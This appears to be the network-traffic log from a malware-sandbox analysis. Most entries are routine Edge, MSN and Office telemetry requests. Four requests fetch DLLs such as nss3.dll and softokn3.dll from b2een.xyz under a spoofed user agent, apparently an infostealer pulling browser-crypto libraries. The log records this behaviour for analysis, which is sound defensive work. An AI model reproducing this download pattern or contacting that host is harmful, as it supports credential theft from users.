Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AAc9vHK.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/BB1lFz6G.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA1hk7Sh.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA1u24yb.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /v4/api/selection?nct=1&fmt=json&nocookie=0&locale=en-us&country=US&muid=3B41451CF8CD6E141684505EF9E46F8C&ACHANNEL=4&ABUILD=117.0.5938.132&clr=esdk&edgeid=6686581979505309747&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&ISSIGNEDIN=0&MSN_CANVAS=2&ISMOBILE=0&BROWSER=6&placement=88000308\|10837393&bcnt=1\|1&asid=c5dc2b26c7684520a843957e070f59ee HTTP/1.1Host: arc.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=3B41451CF8CD6E141684505EF9E46F8C; _EDGE_S=F=1&SID=0662F9504AB965DD2EE2EC124B70641D; _EDGE_V=1
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: b2een.xyzConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /c.gif?rnd=1732530850447&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=c9ace0f4103f4a3e9851b1567c7f1f66&activityId=c9ace0f4103f4a3e9851b1567c7f1f66&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=BEDBCD4E4EB849C3A0914972165CB7CB&MUID=3B41451CF8CD6E141684505EF9E46F8C HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=3B41451CF8CD6E141684505EF9E46F8C; _EDGE_S=F=1&SID=0662F9504AB965DD2EE2EC124B70641D; _EDGE_V=1; SM=T
Source: global traffic	HTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /v4/api/selection?nct=1&fmt=json&nocookie=1&locale=en-us&country=US&muid=3B41451CF8CD6E141684505EF9E46F8C&bcnt=1&placement=88000244&ACHANNEL=4&ABUILD=117.0.5938.132&clr=esdk&edgeid=6686581979505309747&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&asid=7a4df7b7a07c43d3b300308508f43fad HTTP/1.1Host: arc.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=3B41451CF8CD6E141684505EF9E46F8C; _EDGE_S=F=1&SID=0662F9504AB965DD2EE2EC124B70641D; _EDGE_V=1; _C_ETH=1; msnup=
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/BB1msMCf.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/BB1msG0W.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/BB1msyCF.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: b2een.xyzConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: b2een.xyzConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: b2een.xyzConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA1cLbwq?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA1sFuPI?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AAAAWUx?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AAtK5aP?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/BB18CMuA?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
